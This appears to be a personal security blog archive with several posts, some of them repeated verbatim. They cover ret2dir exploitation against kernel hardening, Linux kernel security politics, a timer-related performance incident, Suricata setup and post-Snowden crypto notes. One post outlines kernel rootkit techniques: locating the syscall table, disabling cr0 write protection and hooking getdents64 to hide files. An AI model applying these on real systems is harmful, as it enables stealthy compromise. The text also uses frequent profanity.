A paper "ret2dir: Rethinking Kernel Isolation" was released two years ago. It claimed that ret2dir can bypass modern mitigations including KERNEXEC/UDEREF/SMEP/SMAP/PXN. The author proposed a defensive solution is called eXclusive Page Frame Ownership (XPFO) in the paper. But it was not merge into the vanilla kernel back then. Some guys are trying to merge it again lately.
ret2dir might be a dramatic exploit technique can be useful to bypass mitigations. But it's not that "perfect" when it comes to PaX/Grsecurity. KERNEXEC does much more things than SMEP/PXN simply does not allow kernel code execution from userspace. I'd like to share a few things( truth?):
1, Even under kernel <= 3.9, the kernel patched with PaX/Grsecurity can prevent ret2dir attack without enabling any features. ret2dir only works if a few highly situational conditions satisfied. More detail? Plz ask those who did the tricks;-)
2, The fully ret2dir attack is based on PFN's information. The paper reveals two approaches to get the information:
1) simply read the info from /proc
2) physmap spraying
Unfortunately, all exploits we've found( public exploits & unpacked from malwares) are using the 1st approach in past 18 months. The evidence revealed that all other ret2dir exploits are copycats of these two ret2dir exploit examples( exploit writers aren't work hard?):
IMOHO, ROP is the only option left for ret2dir attack. Otherwise, creating a ROP chains is not that easy on PaX/Grsecurity kernel even without RAP, isn't it?
Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts
Thursday, September 15, 2016
Friday, November 06, 2015
Is Linux kernel secure?
I've read a article "Net of insecurityThe kernel of the argument" from The Washington Post today. It's fuc*ing good one. I've been torturing by the security status of *stable* linux kernel for a fuc*ing long time. I never see one article can talk about the truth like this one. Many commercial customers( especially from financial data centres) has been painful to use commercial GNU/Linux products for years. Remember those 0ld good null-deref exploits and Enlightment framework back in 2000s? What did Linus and these commercial GNU/Linux vendors response back then? They said "A bug is bug" is one thing, while SELinux can protect your asset is another. Unfortunately, they are lies to you, as always.......
I'm not going to talk about those shitty history right here. You can google if you really want to know the truth. A little advice, you could start from here.
Well, speaking of the history of mitigation. I'm highly recommend you should go through thinkist's presentation at BH'10. Who the hell can explain the history so detailed like he did;-)
Black Hat USA 2010: Memory Corruption Attacks: The Almost Complete History
http://thinkst.com/resources/slides/bh-2010-haroon-meer-keynote.pdf
1/5: https://www.youtube.com/watch?v=stVz9rhTdQ8
2/5: https://www.youtube.com/watch?v=HJwg5vdoWCY
3/5: https://www.youtube.com/watch?v=5vDRCi6OQuw
4/5: https://www.youtube.com/watch?v=9edv8FwmJzk
5/5: https://www.youtube.com/watch?v=4XEe5I4Wsrc
"As long as there is technology, there will be hackers. As long as there are hackers, there will be PHRACK magazine."( Quoted from Phrack Issue 63). As long as there are vulnerabilities, there will be exploits. As long as there are exploits, there will be mitigation.........
Basically, the possible evolution of a exploitable bug should be look like this:
---------------------------------------
Bug –> exploitable bug(vulnerability) –> poc –> exploit –> reliable/weaponized exploit
---------------------------------------
That's where the problem comes. There are two types of philosophical ideas about how to deal with exploitable bug.
1, Linus Torvalds represent the philosophy of "A bug is bug", which believes any exploitable bug should be taken care of like the normal bug. When one is being found, just get to fix it. Any security mitigation is fully waste of CPU usage. Developers should've only focus on the features and performance. He( and his followers) even believes bug info's obscurity is the way to prevent attacker and "security through obscurity" is an effective approach for Linux kernel upstream.
2, PaX Team and spender are the most fascinating guys on the side of security mitigation. They( I) believes numerous exploitable bugs can not be solved once for all by fixing them. But we can design some specific security mitigation to against the specific types of vulnerabilities. That's the only way to solve this issue.
Well, those two philosophical ideas are totally different. Why the hell happens? IMOHO, one of main reasons is the threat model is totally different. In my own adversary, the attackers may have the weaponized exploits, which developed by digital armory( Vupen, HT?) or underground. While only the skiddies in Linus's threat model( it seems to be at least;-)).
Some commercial GNU/Linux vendors basically believes public exploit is the most important reason to influence their risk assessment. Don't believe that? They admitted by themselves;-)
A lot of my customers always says one of reasons they choose GNU/Linux as their alternatives of UNIX, because GNU/Linux is secure. I've been wondering all the time and response like "ARE U fuc*ing serious?". Now GNU/Linux is dive into the next age of Internet, which some people would like to call IoT( internet of the things). But the question is: Is Linux kernel ready to face the tons of cybercriminals? You fuc*ing tell me........
btw: Kernel/Compiler/Firmware are very important core infrastructures of modern cyber world. A lot of good people are busy to defend our world by their effort. PaX/Grsecurity guys are my heros. Reproducible builds( based on the theory of DDC, by David A. Wheeler) is definitely gonna piss NSA off. CHIPSEC( for firmware) may be the starting point. I do believe only the fined FOSS solution can make this world a little more secure......
I'm not going to talk about those shitty history right here. You can google if you really want to know the truth. A little advice, you could start from here.
Well, speaking of the history of mitigation. I'm highly recommend you should go through thinkist's presentation at BH'10. Who the hell can explain the history so detailed like he did;-)
Black Hat USA 2010: Memory Corruption Attacks: The Almost Complete History
http://thinkst.com/resources/slides/bh-2010-haroon-meer-keynote.pdf
1/5: https://www.youtube.com/watch?v=stVz9rhTdQ8
2/5: https://www.youtube.com/watch?v=HJwg5vdoWCY
3/5: https://www.youtube.com/watch?v=5vDRCi6OQuw
4/5: https://www.youtube.com/watch?v=9edv8FwmJzk
5/5: https://www.youtube.com/watch?v=4XEe5I4Wsrc
"As long as there is technology, there will be hackers. As long as there are hackers, there will be PHRACK magazine."( Quoted from Phrack Issue 63). As long as there are vulnerabilities, there will be exploits. As long as there are exploits, there will be mitigation.........
Basically, the possible evolution of a exploitable bug should be look like this:
---------------------------------------
Bug –> exploitable bug(vulnerability) –> poc –> exploit –> reliable/weaponized exploit
---------------------------------------
That's where the problem comes. There are two types of philosophical ideas about how to deal with exploitable bug.
1, Linus Torvalds represent the philosophy of "A bug is bug", which believes any exploitable bug should be taken care of like the normal bug. When one is being found, just get to fix it. Any security mitigation is fully waste of CPU usage. Developers should've only focus on the features and performance. He( and his followers) even believes bug info's obscurity is the way to prevent attacker and "security through obscurity" is an effective approach for Linux kernel upstream.
2, PaX Team and spender are the most fascinating guys on the side of security mitigation. They( I) believes numerous exploitable bugs can not be solved once for all by fixing them. But we can design some specific security mitigation to against the specific types of vulnerabilities. That's the only way to solve this issue.
Well, those two philosophical ideas are totally different. Why the hell happens? IMOHO, one of main reasons is the threat model is totally different. In my own adversary, the attackers may have the weaponized exploits, which developed by digital armory( Vupen, HT?) or underground. While only the skiddies in Linus's threat model( it seems to be at least;-)).
Some commercial GNU/Linux vendors basically believes public exploit is the most important reason to influence their risk assessment. Don't believe that? They admitted by themselves;-)
A lot of my customers always says one of reasons they choose GNU/Linux as their alternatives of UNIX, because GNU/Linux is secure. I've been wondering all the time and response like "ARE U fuc*ing serious?". Now GNU/Linux is dive into the next age of Internet, which some people would like to call IoT( internet of the things). But the question is: Is Linux kernel ready to face the tons of cybercriminals? You fuc*ing tell me........
btw: Kernel/Compiler/Firmware are very important core infrastructures of modern cyber world. A lot of good people are busy to defend our world by their effort. PaX/Grsecurity guys are my heros. Reproducible builds( based on the theory of DDC, by David A. Wheeler) is definitely gonna piss NSA off. CHIPSEC( for firmware) may be the starting point. I do believe only the fined FOSS solution can make this world a little more secure......
Thursday, April 09, 2015
Debian GNU/Linux security checklist and hardening
The 1st time I met Debian GNU/Linux was about a decade ago when I was a college dude. Stupid college life was too boring back then;-) It was almost the same time I met Phrack ezine in my 1st time. Damn, time is running on...
Anyway, I'd like to share this article "Debian GNU/Linux security checklist and hardening" with you guys. H0pe you can find your peace in this pathetic era;-) Yeah..yeah..I just wanna say: "Phrack is not dead, PaX/Grsecurity is not dead, DNFWAH is not dead, 0ld sch00l is not dead, the Underground spirit is not dead.....If they were, that'd be on us!!!".
Anyway, I'd like to share this article "Debian GNU/Linux security checklist and hardening" with you guys. H0pe you can find your peace in this pathetic era;-) Yeah..yeah..I just wanna say: "Phrack is not dead, PaX/Grsecurity is not dead, DNFWAH is not dead, 0ld sch00l is not dead, the Underground spirit is not dead.....If they were, that'd be on us!!!".
Tuesday, March 17, 2015
HIGHRES TIMER can be your DoS nightmare
This is a real-life story about HIGH RESOLUTION TIMER and how lame coders use it to make a self-DoS;-) You should be very cautions if your system was written by those type of coders. Incident happened: 1, A dozen of RHEL 6 GNU/Linux servers were extremely slow while running some *** applications. The kernel CPU usage was about 40%--50%. 2, the "free" item from vmstat was not seems OK. "free" was keep increasing but "buff" & "cache" were decreasing when a bunch of data went through. Then kernel gave you a *hint* about OOM( Out of Memory): "kernel panic - not syncing: Out of memory and no killable processes..." Then kernel tried to kill each processes until shit happened, which was kernel panic. I began this investigation with strace. The result was quite strange. Why would the application( malware?) invoke the syscall nanosleep() so often? Every 10000ns( 10us)? Seriously? All I can tell is the application doesn't need to do real time work. -------------------------------------------------------------- 15:30:08.002047 nanosleep({0, 10000}, NULL) = 0 <0 .000082=""> 15:30:08.002175 nanosleep({0, 10000}, NULL) = 0 <0 .000074=""> 15:30:08.002297 nanosleep({0, 10000}, NULL) = 0 <0 .000074=""> ... 15:30:09.917557 nanosleep({0, 10000}, NULL) = 0 <0 .000075=""> 15:30:09.917661 nanosleep({0, 10000}, NULL) = 0 <0 .000071=""> -------------------------------------------------------------- The customer said it was never happened in 0ld good GNU/Linux systems( like RHEL 5). My guts hints me to a direction: High Resolution Timer. A type of kernel timer that can provide more accurate time measure. I've read Linux Manual and very well explained kernel doc and
learned that HIGHRES TIMER was added to the upstream code in 2.6.21. So I guess..just guess..some lazy & lame coders just want to make the program "sleep" in a very "short" time. Then he/she wrote this code very confidently: usleep(10); If you're running linux kernel before 2.6.21, this line of code will only sleep between 1ms and 2ms. But..annoying *but* is coming..if you're running *modern* GNU/Linux distro with HIGHRES support, the same code will sleep 10us, which might cause performance hit. CentOS community had the similar issue before: From the evidence we have, there are two clues might lead us to the crime-scene: High Resolution Timer. 1, nanosleep() has been invoked >=8k times in every fuc*ing second. 2, The victim kernel was not running with kdump. But we still have some kernel logs. According to the CallTrace, the kernel was playing with HIGHRES-related context should not be a coincidence: [] ? audit_syscall_exit+0x27e/0x290 [ ] ? sysret_audit+0x16/0x20 [ ] ? __hrtimer_start_range_ns+0x1a3/0x460 [ ] ? sysret_audit+0x16/0x20 [ ] ? sysret_audit+0x16/0x20 [ ] ? audit_filter_rules+0x2d/0xa10 [ ] ? audit_syscall_exit+0x27e/0x290 [ ] ? sysret_audit+0x16/0x20 schedule_timeout: wrong timeout value ffffffffffffb572 Solution: I'm giving you two options: 1, Modify the source code( if you have) about *sleep*-related functions and tell the fuc*ing coders they can go home and fuck themselves. 2, Append "nohz=off highres=off" to the file /etc/grub.conf, to turn it fuc*ing off this feature. Testing result: Unfortunately, we had to test this in a production system..but we did it. +-----------------------------------------------+ | Item | HIGHRES ON | HIGHRES OFF | +-----------------------------------------------+ | nanosleep | >8,000 times | 345 times | +-----------------------------------------------+ | buff/cache| Decreasing | Increasing | +-----------------------------------------------+ | %sys | 50% | 6% | +-----------------------------------------------+ Well, I guess we arrested the *perpetrator* this time. Damn...not every
business impact caused by security issues;-)
Monday, March 31, 2014
Suricata's file extraction on Debian GNU/Linux
Suricata is a high performance open source IDS/IPS project. I used it a long time ago around 2010 when it was released. I've been playing with Snort recently and then found Suricata has a great feature: File extraction. It'd be helpful to those who want to get malware samples from IDS. Anyway, like old days, I want to test it on my own and see how it works on Debian. First things first, I need to build it and see if it works.
Download a latest version of the small installation ISO image. I need to clarify my testing environment: Debian is running on my virtual machine, which has two NICs are eth0 and eth1. Interface eth0 is running on NAT mode and eth1 is running bridge mode. Debian don't assign any IP addr to eth1.
Because our Debian is the small installation. So we have to install some dependency packages via simply apt-get:
#apt-get install vim openssh-server ethtool libpcap-dev libnfnetlink-dev libnetfilter-queue-dev libdnet-dev libdumbnet-dev libpcre3-dev libpcre3-dbg bison flex make zlib1g-dev autoconf libtool libnss3-dev libnspr4-dev libjansson4 libjansson-dev libyaml-dev libcap-ng0 libcap-ng-dev libnet1-dev libmagic-dev build-essential
Get the source code of Suricata:
#cd /tmp
#wget wget http://www.openinfosecfoundation.org/download/suricata-2.0.tar.gz
#tar zxvf suricata-2.0.tar.gz
#cd suricata-2.0
Compile and installation:
#./configure --enable-nfqueue --enable-gccprotect --prefix=/usr/local/suricata --localstatedir=/var
#make -j3
#make make-full
Edit suricata.yaml:
1, Set the request/response body a litte bigger:
request-body-limit: 1gb #3072
response-body-limit: 1gb #3072
2, Enable file extraction:
- file-store:
enabled: yes # set to yes to enable
log-dir: files # directory to store the files
force-magic: no # force logging magic on all stored files
force-md5: no # force logging of md5 checksums
waldo: file.waldo # waldo file to store the file_id across runs
# output module to log files tracked in a easily parsable json format
- file-log:
enabled: yes
filename: files-json.log
append: yes
#filetype: regular # 'regular', 'unix_stream' or 'unix_dgram'
3, Add our "test" rule file( test.rules in this case) into the section "default-rule-path:", like:
default-rule-path: /usr/local/suricata/etc/suricata/rules
rule-files:
- test.rules
- botcc.rules
Create a rule file:
/usr/local/suricata/etc/suricata/rules/test.rules
Add one line into test.rules( to save any jpg files) :
alert http any any -> any any (msg:"FILESTORE jpg"; fileext:"jpg"; filestore; sid:6; rev:1;)
Enable the eth1:
#ifconfig eth1 up
According to the Suricata's wiki, we should turn off the TCP GSO:
ethtool -K eth1 tso off
ethtool -K eth1 gro off
ethtool -K eth1 lro off
ethtool -K eth1 gso off
ethtool -K eth1 rx off
ethtool -K eth1 tx off
ethtool -K eth1 sg off
ethtool -K eth1 rxvlan off
ethtool -K eth1 txvlan off
ethtool -N eth1 rx-flow-hash udp4 sdfn
ethtool -N eth1 rx-flow-hash udp6 sdfn
ethtool -n eth1 rx-flow-hash udp6
ethtool -n eth1 rx-flow-hash udp4
ethtool -C eth1 rx-usecs 1000
ethtool -C eth1 adaptive-rx off
Run the Suricata with this command:
/usr/local/suricata/bin/suricata -c /usr/local/suricata/etc/suricata//suricata.yaml -i eth1
Use your firefox/chrome on your host machine, and visit some website, like this.
You should see some girl pictures in /var/log/suricata/files ;-)
btw: Thanks to Suricata community brings us this fuc*ing awesome IDS/IPS project. Special thanks to Peter Manev.
Download a latest version of the small installation ISO image. I need to clarify my testing environment: Debian is running on my virtual machine, which has two NICs are eth0 and eth1. Interface eth0 is running on NAT mode and eth1 is running bridge mode. Debian don't assign any IP addr to eth1.
Because our Debian is the small installation. So we have to install some dependency packages via simply apt-get:
#apt-get install vim openssh-server ethtool libpcap-dev libnfnetlink-dev libnetfilter-queue-dev libdnet-dev libdumbnet-dev libpcre3-dev libpcre3-dbg bison flex make zlib1g-dev autoconf libtool libnss3-dev libnspr4-dev libjansson4 libjansson-dev libyaml-dev libcap-ng0 libcap-ng-dev libnet1-dev libmagic-dev build-essential
Get the source code of Suricata:
#cd /tmp
#wget wget http://www.openinfosecfoundation.org/download/suricata-2.0.tar.gz
#tar zxvf suricata-2.0.tar.gz
#cd suricata-2.0
Compile and installation:
#./configure --enable-nfqueue --enable-gccprotect --prefix=/usr/local/suricata --localstatedir=/var
#make -j3
#make make-full
Edit suricata.yaml:
1, Set the request/response body a litte bigger:
request-body-limit: 1gb #3072
response-body-limit: 1gb #3072
2, Enable file extraction:
- file-store:
enabled: yes # set to yes to enable
log-dir: files # directory to store the files
force-magic: no # force logging magic on all stored files
force-md5: no # force logging of md5 checksums
waldo: file.waldo # waldo file to store the file_id across runs
# output module to log files tracked in a easily parsable json format
- file-log:
enabled: yes
filename: files-json.log
append: yes
#filetype: regular # 'regular', 'unix_stream' or 'unix_dgram'
3, Add our "test" rule file( test.rules in this case) into the section "default-rule-path:", like:
default-rule-path: /usr/local/suricata/etc/suricata/rules
rule-files:
- test.rules
- botcc.rules
Create a rule file:
/usr/local/suricata/etc/suricata/rules/test.rules
Add one line into test.rules( to save any jpg files) :
alert http any any -> any any (msg:"FILESTORE jpg"; fileext:"jpg"; filestore; sid:6; rev:1;)
Enable the eth1:
#ifconfig eth1 up
According to the Suricata's wiki, we should turn off the TCP GSO:
ethtool -K eth1 tso off
ethtool -K eth1 gro off
ethtool -K eth1 lro off
ethtool -K eth1 gso off
ethtool -K eth1 rx off
ethtool -K eth1 tx off
ethtool -K eth1 sg off
ethtool -K eth1 rxvlan off
ethtool -K eth1 txvlan off
ethtool -N eth1 rx-flow-hash udp4 sdfn
ethtool -N eth1 rx-flow-hash udp6 sdfn
ethtool -n eth1 rx-flow-hash udp6
ethtool -n eth1 rx-flow-hash udp4
ethtool -C eth1 rx-usecs 1000
ethtool -C eth1 adaptive-rx off
Run the Suricata with this command:
/usr/local/suricata/bin/suricata -c /usr/local/suricata/etc/suricata//suricata.yaml -i eth1
Use your firefox/chrome on your host machine, and visit some website, like this.
You should see some girl pictures in /var/log/suricata/files ;-)
btw: Thanks to Suricata community brings us this fuc*ing awesome IDS/IPS project. Special thanks to Peter Manev.
Thursday, February 06, 2014
Simple linux rootkit on Debian with kernel 3.13
I've wasted a lot of time in 2013. I've always find some shity execuses, like "I'm fucking busy recently" to delay my hacking journey of kernel rootkit. This was supposed to be done a couple of months ago. Thank L0rd! I found a slot during Chinese new year vacation at my hometown. I begun the adventure of rootkit hacking. I've read a bunch of great Phrack papers from the old good hacking days. It's old but it'd help.
---------------------------------------------------------------
[Weakening the Linux Kernel, Phrack Magazine Volume 8, Issue 52
January 26, 1998, article 18 of 20]
http://www.phrack.org/issues.html?issue=52&id=18&mode=txt
[Advances in Kernel Hacking, Volume 0x0b, Issue 58, Phile #0x06 of
0x0e]
http://www.phrack.org/issues.html?issue=58&id=6&mode=txt
[Handling Interrupt Descriptor Table for fun and profit, Volume 0x0b,
Issue 59, Phile #0x04 of 0x12]
http://www.phrack.org/issues.html?issue=59&id=4&mode=txt
[Kernel Rootkit Experiences, Volume 0x0b, Issue 61, Phile 0x0e of
0x0f]
http://www.phrack.org/issues.html?issue=61&id=14&mode=txt
[Mistifying the debugger, Volume 0x0c, Issue 65, Phile #0x08 of
0x0f]
http://www.phrack.org/issues.html?issue=65&id=8&mode=txt
Especially thanks to THC's paper, which was released in 1999:
[Complete Linux Loadable Kernel Modules]
https://www.thc.org/papers/LKM_HACKING.html
---------------------------------------------------------------
I wrote a simple rootkit that can only hide a specific file. Just a
few old school steps could make its feature possible:
Firstly, we need to retrieve the system call table. But it's no longer
exported since 2.6. Fortunately, there's still a few system calls are
exported. sys_close() is one of them:
--------------------------------------
root@d6-test:/home/shawn# grep sys_close /boot/System.map-3.13.0
c10e0aa1 T sys_close
c140fdc4 R __ksymtab_sys_close
c141815c r __kcrctab_sys_close
c1420e33 r __kstrtab_sys_close
--------------------------------------
I used a brute force way to locate that system call. I learned it from
memset's blog:
https://memset.wordpress.com/2011/03/18/syscall-hijacking-dynamically-obtain-syscall-table-address-kernel-2-6-x-2/
Start mem addr would be 0xc0000000, then it would try it repeatly unti
it locate sys_close()'s addr.
Then, write protection bit in cr0 has to be shut down. WP bit is the
16th bit in cr0 register.
31 30 29 28 19 18 17 16 15 6 5 4 3 2 1 0
+----------------------------------------------------------------------+
|PG|CD |NW|-----------------|AM|---|WP|--------------|NE|ET|TS|EM|MP|PE|
+----------------------------------------------------------------------+
After we done above steps, we are able to hijack the system call we
want. Here I choose to hijack getdents64(). Why? Because all I wanna
do is hide a specific file from "ls". Let's see what "ls" would
usually do:
------------------------------------------
// begin.........
execve("/bin/ls", ["ls"], [/* 16 vars */]) = 0
brk(0) = 0x8366000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7791000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=19346, ...}) = 0
.......................
.......................
.......................
// look, that's it
getdents64(3, /* 17 entries */, 32768) = 544
getdents64(3, /* 0 entries */, 32768) = 0
close(3) = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7790000
.......................
// then it would display them in the standard out(1)
write(1, "a.out dirent.c dirent.c~ insi"..., 107a.out dirent.c dirent.c~ insight-lab libmnl libnftables linux-3.13 linux-3.13.tar my_tmp nftables
) = 107
.......................
------------------------------------------
The only struct from kernel we have to face is:
-------------------------------------------------------------------
struct linux_dirent {
unsigned long d_ino; /* Inode number */
unsigned long d_off; /* Offset to next linux_dirent */
unsigned short d_reclen; /* Length of this linux_dirent */
char d_name[]; /* Filename (null-terminated) */
/* length is actually (d_reclen - 2 -
offsetof(struct linux_dirent, d_name) */
/*
char pad; // Zero padding byte
char d_type; // File type (only since Linux 2.6.4;
// offset is (d_reclen - 1))
*/
}
-------------------------------------------------------------------
d_reclen is size of the current linux_dirent64, it does matters. Plz
read the fucking source code for any detail! Well, like in good old days, I drew an ascii big picture here.
May the L0rd's hacking spirit guide us!!!
---------------------------------------------------------------
[Weakening the Linux Kernel, Phrack Magazine Volume 8, Issue 52
January 26, 1998, article 18 of 20]
http://www.phrack.org/issues.html?issue=52&id=18&mode=txt
[Advances in Kernel Hacking, Volume 0x0b, Issue 58, Phile #0x06 of
0x0e]
http://www.phrack.org/issues.html?issue=58&id=6&mode=txt
[Handling Interrupt Descriptor Table for fun and profit, Volume 0x0b,
Issue 59, Phile #0x04 of 0x12]
http://www.phrack.org/issues.html?issue=59&id=4&mode=txt
[Kernel Rootkit Experiences, Volume 0x0b, Issue 61, Phile 0x0e of
0x0f]
http://www.phrack.org/issues.html?issue=61&id=14&mode=txt
[Mistifying the debugger, Volume 0x0c, Issue 65, Phile #0x08 of
0x0f]
http://www.phrack.org/issues.html?issue=65&id=8&mode=txt
Especially thanks to THC's paper, which was released in 1999:
[Complete Linux Loadable Kernel Modules]
https://www.thc.org/papers/LKM_HACKING.html
---------------------------------------------------------------
I wrote a simple rootkit that can only hide a specific file. Just a
few old school steps could make its feature possible:
Firstly, we need to retrieve the system call table. But it's no longer
exported since 2.6. Fortunately, there's still a few system calls are
exported. sys_close() is one of them:
--------------------------------------
root@d6-test:/home/shawn# grep sys_close /boot/System.map-3.13.0
c10e0aa1 T sys_close
c140fdc4 R __ksymtab_sys_close
c141815c r __kcrctab_sys_close
c1420e33 r __kstrtab_sys_close
--------------------------------------
I used a brute force way to locate that system call. I learned it from
memset's blog:
https://memset.wordpress.com/2011/03/18/syscall-hijacking-dynamically-obtain-syscall-table-address-kernel-2-6-x-2/
Start mem addr would be 0xc0000000, then it would try it repeatly unti
it locate sys_close()'s addr.
Then, write protection bit in cr0 has to be shut down. WP bit is the
16th bit in cr0 register.
31 30 29 28 19 18 17 16 15 6 5 4 3 2 1 0
+----------------------------------------------------------------------+
|PG|CD |NW|-----------------|AM|---|WP|--------------|NE|ET|TS|EM|MP|PE|
+----------------------------------------------------------------------+
After we done above steps, we are able to hijack the system call we
want. Here I choose to hijack getdents64(). Why? Because all I wanna
do is hide a specific file from "ls". Let's see what "ls" would
usually do:
------------------------------------------
// begin.........
execve("/bin/ls", ["ls"], [/* 16 vars */]) = 0
brk(0) = 0x8366000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7791000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=19346, ...}) = 0
.......................
.......................
.......................
// look, that's it
getdents64(3, /* 17 entries */, 32768) = 544
getdents64(3, /* 0 entries */, 32768) = 0
close(3) = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7790000
.......................
// then it would display them in the standard out(1)
write(1, "a.out dirent.c dirent.c~ insi"..., 107a.out dirent.c dirent.c~ insight-lab libmnl libnftables linux-3.13 linux-3.13.tar my_tmp nftables
) = 107
.......................
------------------------------------------
The only struct from kernel we have to face is:
-------------------------------------------------------------------
struct linux_dirent {
unsigned long d_ino; /* Inode number */
unsigned long d_off; /* Offset to next linux_dirent */
unsigned short d_reclen; /* Length of this linux_dirent */
char d_name[]; /* Filename (null-terminated) */
/* length is actually (d_reclen - 2 -
offsetof(struct linux_dirent, d_name) */
/*
char pad; // Zero padding byte
char d_type; // File type (only since Linux 2.6.4;
// offset is (d_reclen - 1))
*/
}
-------------------------------------------------------------------
d_reclen is size of the current linux_dirent64, it does matters. Plz
read the fucking source code for any detail! Well, like in good old days, I drew an ascii big picture here.
May the L0rd's hacking spirit guide us!!!
Wednesday, December 25, 2013
Life was never easy...especially in post-prism era;-)
I've watched a great free speech today:
Bruce Schneier, our great philosopher in cybersec field. And Eben Moglen, afaik, he is a great hacker( not in computer stuff) in free software law field. I do remember I used to listen Eben's free speech( electronic version) when I was in college. Seven years until now, I know better about why there are group of people has been trying fight for digital rights, software freedom, etc.....
I'm here to share something I've learn from Bruce and Eben today. This writeup is going to be my notes and some personal summary of 2013. It may be mess a little bit;-)
What do we learn from Mr Snowden's disclosure about crypto?
------------------------------------------------------------------
Cryptography itself is still hard to break. NSA is not breaking the math, but breaking by cheating, by stealing private keys, by forging certificates, by doing non-crypto stuff to archive their *ditry* goals. Even in the fucked-up case of Google, NSA didn't crack the traffic between user's browser and Google's server. Because Google uses client auth SSL at default, more importantly, it works( NSA dont like it). But NSA hijacked the traffic between Google data centers where the SSL/TLS was removed for whatever reasons( cost?). Crypto is still the one of the best ways to fight NSA or NSA-like organization.
Tor stories?
------------------------------------------------------------------
Personally, I like Tor. It probably could save people's life in some "restricted" area. Tor is pissed off agencies like NSA. The contributors of Tor project have routine seminars. It seems that the discussion of how to break Tor is their daily bread;-) Thanks to Tor project contributors.
What if NSA is in our threat model?
------------------------------------------------------------------
The 1st thing is mitigation: NSA got a piece of math but still need a bunch of engineers to make it work. Let NSA pay for higher cost( timing budget not new math). Plz use particular crypto technology( on GNU/Linux distro) as much as possible. It's reasonable to speculating that NSA has something about crypto stuff but we don't. Information asymmetry is indeed exsit. Of course NSA known what we do in past decades but we are rarely to known what NSA has been doing in the same period..so thanks to Mr Snowden's disclosure gave us *a little more* information.
And NSA-like organizations are definitely needs a lot of automated attack tools: foxasset? The reason it simple: you can't just train people on the street to become old school hackers in few months. That's why they have to develop automated tools.
btw: What does old school hacker mean in my context? A type of people who are highly skilled with low-level techniques, such as *NIX System, networking( both internet stuff and corenet of telco), reversing, cryptography, C/ASM code audit, etc..and also have a specific type of strong philosophy with underground spirit;-)....ug spirit~wth
Standard corruption?
------------------------------------------------------------------
It's not all standards does security matters. Bruce thinks AES is still secure. We can't only blame the Dual ECC stuff to standard process's fault. Implementation is important, such as non-NSA involved internation cellphone standard was fucked up..A1/5? Ring the bell? We should only trust these public standards, which our guys( free software enthusiast, cybersec philosophical anarchist like Phrack guys? or people like Bruce?:)) are getting involve with it.
What tools can we trust?
------------------------------------------------------------------
GNUPG, tor, OTR, etc... Some of these open source tools are written by security/crypto paranoids. They have a very awesome design and implementation.
What if you are on the target list of NSA-like organization?
------------------------------------------------------------------
If you are targeted, there's nothing you can do in that level. Is this a super-APT shit?
Is cyberwar going to be end?
------------------------------------------------------------------
I don't think so. If everyone holds the philosophy of "I'll fuck you if you don't fuck me first, sir", then it would turn the whole scene to be everybody being fucked by everybody. That's what old school hackers has been through the paradigm shift( painfully?) from old good hacking days to "This is cyber, sir!".
Is that sounds we are hopeless?
------------------------------------------------------------------
Nope, quoted from Bruce:"Society improves because people dare to think the unthinkable and then after 20, 30 years everyone says that was kind of good idea. It takes a while but it has to start."
FOSS solutions?
------------------------------------------------------------------
Bruce thinks open source solution is more secure than closed ones. Because:
1, You can look at it( source code)
2, It's harder to let someone slip into
We probably don't need to worry too much( did I say "too much"?) about NSA was/is/will try to put backdoor in some fundamental free software projects, like linux kernel, GCC, Glibc, "supposed to be re-written" openssl;-) etc. Because according to the full-disclosured documentations, NSA seems amazingly risks aversed. They only want to take a safe path. Yeah..yeah, I know what they're thinking...you can do evil, but don't be caught up;-) Free/open source community have a lot of old school hackers has been do code review for decades. They did a great job. And they are going to continue this *secret* war aginst NSA-like organization. So it's not easy attack( backdooring) on compiler.....( and, there are tons of guys like me are trying to be old school hackers).
Leap of faith?
------------------------------------------------------------------
Yeah, it sounds perfect. But no one can ensure you 100% secure. But the fact is that you can't examine everything. You must trust them( the tools you use). Give yourself a little faith. Did Soren A. Kierkegarrd said that we could feel comfortable to use GCC;-)
Well, use Apple products( iphone, ipad, ishit) and Microsoft products( Win for gaming platform, Office for whatever) are not a good options. Drop them, come on!
Hardware box issues: never update the full-disclosured vulns:
------------------------------------------------------------------
In some countries, cybersec business couldn't support small business. The reason cause that happened, because the most of customers had/have the wrong concept about cybersec. They think the only thing you need to do is
buy a bunch of hardware boxes( firewall, IDS/IPS, UTM, NGFW, or whatever). Obviously, it's violating the very important old school principles:
------------------------------------------------------------------
Security is NOT:
Security is NOT installing a firewall ..
Security is NOT a Product or Service .. ( by Schneier, Bruce )
Security is Not a Product; It's a Process .. ( by Schneier, Bruce )
A Security Audit is NOT "running a port scan and turning things off" ..
Security is:
Security is "Can you still continue to work productively/safely, without compounding the security breach"
Security is only as good as your "weakest link"
Security is "risk management" of your corporate resources(computers/people), required expertise, time management, implementation costs, data backup/recovery proceedures ...
Security is a Process, Methodology, Costs, Policies and People
Security is "Can somebody physically walk out with your computers,
disks, tapes, .. "
Security is 24x7x365 ... constantly ongoing .. never ending
Security is "learn all you can as fast as you can, without negatively
affecting the network, productivity and budget"
------------------------------------------------------------------
